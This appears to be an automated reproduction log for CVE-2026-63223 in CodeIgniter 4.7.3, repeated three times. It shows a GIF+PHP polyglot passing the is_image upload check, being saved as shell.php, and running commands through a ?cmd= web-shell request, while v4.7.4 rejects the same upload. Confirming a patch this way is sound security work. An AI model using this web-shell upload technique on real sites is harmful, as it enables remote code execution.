[*] CVE-2026-63223 reproduction starting at 2026-08-01T13:24:44Z PHP 8.5.4 (cli) (built: Jul 16 2026 18:56:38) (NTS) PHP version 8.5.4 (/usr/bin/php8.5) Run the "diagnose" command to get more detailed diagnostics output. Composer version 2.10.2 2026-07-01 11:24:45 [*] Using repository path: /pruva/project-cache/repo [!] Named fixed commit b6e9a4fa not present in codeigniter4/framework mirror; using release tag v4.7.4 (verified to contain the named fix helpers) [*] Vulnerable checkout: v4.7.3 (ab9bf33caa3ccc25b1a4652234d7d0eb1d1937de) [*] Fixed checkout: v4.7.4 (67ead895b7491703e5e5bc17436778806192008f) [+] Patch-anchor verification OK: fix helper absent in v4.7.3, present in v4.7.4 [+] Polyglot sniffs as image/gif while carrying PHP code [-] Server on port 18095 failed to start; log follows CodeIgniter v4.7.3 Command Line Tool - Server Time: 2026-08-01 13:24:45 UTC+00:00 CodeIgniter development server started on http://localhost:18095 Press Control-C to stop. [Sat Aug 1 13:24:45 2026] PHP 8.5.4 Development Server (http://localhost:18095) started [-] control: non-image upload was NOT rejected on vulnerable build [*] CVE-2026-63223 reproduction starting at 2026-08-01T13:26:03Z PHP 8.5.4 (cli) (built: Jul 16 2026 18:56:38) (NTS) PHP version 8.5.4 (/usr/bin/php8.5) Run the "diagnose" command to get more detailed diagnostics output. Composer version 2.10.2 2026-07-01 11:24:45 [*] Using repository path: /pruva/project-cache/repo [!] Named fixed commit b6e9a4fa not present in codeigniter4/framework mirror; using release tag v4.7.4 (verified to contain the named fix helpers) [*] Vulnerable checkout: v4.7.3 (ab9bf33caa3ccc25b1a4652234d7d0eb1d1937de) [*] Fixed checkout: v4.7.4 (67ead895b7491703e5e5bc17436778806192008f) [+] Patch-anchor verification OK: fix helper absent in v4.7.3, present in v4.7.4 [+] Polyglot sniffs as image/gif while carrying PHP code {"status":"rejected","errors":{"userfile":"userfile is not a valid, uploaded image file."}} [+] control: non-image upload rejected by is_image on vulnerable build (rule is active) [*] vuln attempt 1: POST polyglot as shell.php {"status":"saved","path":"uploads/shell.php"} [*] vuln attempt 1: GET /uploads/shell.php?cmd=echo RCE_1_1785590766_8732;id GIF89a; RCE_1_1785590766_8732 uid=1000(vscode) gid=1000(vscode) groups=1000(vscode) [+] vuln attempt 1: upload accepted AND shell.php executed (marker + id output present, source not leaked) [*] vuln attempt 2: POST polyglot as shell.php {"status":"saved","path":"uploads/shell.php"} [*] vuln attempt 2: GET /uploads/shell.php?cmd=echo RCE_2_1785590768_9921;id GIF89a; RCE_2_1785590768_9921 uid=1000(vscode) gid=1000(vscode) groups=1000(vscode) [+] vuln attempt 2: upload accepted AND shell.php executed (marker + id output present, source not leaked) [*] fixed attempt 1: POST same polyglot as shell.php [*] fixed attempt 1: upload HTTP=400, shell GET HTTP=404 [+] fixed attempt 1: upload rejected, no shell.php written, GET 404 [*] fixed attempt 2: POST same polyglot as shell.php [*] fixed attempt 2: upload HTTP=400, shell GET HTTP=404 [+] fixed attempt 2: upload rejected, no shell.php written, GET 404 ============================================================ Vulnerable (v4.7.3) RCE attempts succeeded: 2/2 Fixed (v4.7.4) rejection attempts succeeded: 2/2 [+] CONFIRMED: v4.7.3 accepted GIF89a+PHP polyglot as shell.php via is_image and GET /uploads/shell.php?cmd= executed attacker commands (uid output + unique marker) in 2/2 attempts; v4.7.4 rejected the same upload with a validation error, wrote no file, and GET returned 404 in 2/2 attempts. Named fixed commit b6e9a4fa unresolvable in framework mirror; fixed ref used: v4.7.4 (67ead895b7491703e5e5bc17436778806192008f). [*] CVE-2026-63223 reproduction starting at 2026-08-01T13:26:46Z PHP 8.5.4 (cli) (built: Jul 16 2026 18:56:38) (NTS) PHP version 8.5.4 (/usr/bin/php8.5) Run the "diagnose" command to get more detailed diagnostics output. Composer version 2.10.2 2026-07-01 11:24:45 [*] Using repository path: /pruva/project-cache/repo [!] Named fixed commit b6e9a4fa not present in codeigniter4/framework mirror; using release tag v4.7.4 (verified to contain the named fix helpers) [*] Vulnerable checkout: v4.7.3 (ab9bf33caa3ccc25b1a4652234d7d0eb1d1937de) [*] Fixed checkout: v4.7.4 (67ead895b7491703e5e5bc17436778806192008f) [+] Patch-anchor verification OK: fix helper absent in v4.7.3, present in v4.7.4 [+] Polyglot sniffs as image/gif while carrying PHP code {"status":"rejected","errors":{"userfile":"userfile is not a valid, uploaded image file."}} [+] control: non-image upload rejected by is_image on vulnerable build (rule is active) [*] vuln attempt 1: POST polyglot as shell.php {"status":"saved","path":"uploads/shell.php"} [*] vuln attempt 1: GET /uploads/shell.php?cmd=echo RCE_1_1785590809_31648;id GIF89a; RCE_1_1785590809_31648 uid=1000(vscode) gid=1000(vscode) groups=1000(vscode) [+] vuln attempt 1: upload accepted AND shell.php executed (marker + id output present, source not leaked) [*] vuln attempt 2: POST polyglot as shell.php {"status":"saved","path":"uploads/shell.php"} [*] vuln attempt 2: GET /uploads/shell.php?cmd=echo RCE_2_1785590811_15094;id GIF89a; RCE_2_1785590811_15094 uid=1000(vscode) gid=1000(vscode) groups=1000(vscode) [+] vuln attempt 2: upload accepted AND shell.php executed (marker + id output present, source not leaked) [*] fixed attempt 1: POST same polyglot as shell.php [*] fixed attempt 1: upload HTTP=400, shell GET HTTP=404 [+] fixed attempt 1: upload rejected, no shell.php written, GET 404 [*] fixed attempt 2: POST same polyglot as shell.php [*] fixed attempt 2: upload HTTP=400, shell GET HTTP=404 [+] fixed attempt 2: upload rejected, no shell.php written, GET 404 ============================================================ Vulnerable (v4.7.3) RCE attempts succeeded: 2/2 Fixed (v4.7.4) rejection attempts succeeded: 2/2 [+] CONFIRMED: v4.7.3 accepted GIF89a+PHP polyglot as shell.php via is_image and GET /uploads/shell.php?cmd= executed attacker commands (uid output + unique marker) in 2/2 attempts; v4.7.4 rejected the same upload with a validation error, wrote no file, and GET returned 404 in 2/2 attempts. Named fixed commit b6e9a4fa unresolvable in framework mirror; fixed ref used: v4.7.4 (67ead895b7491703e5e5bc17436778806192008f).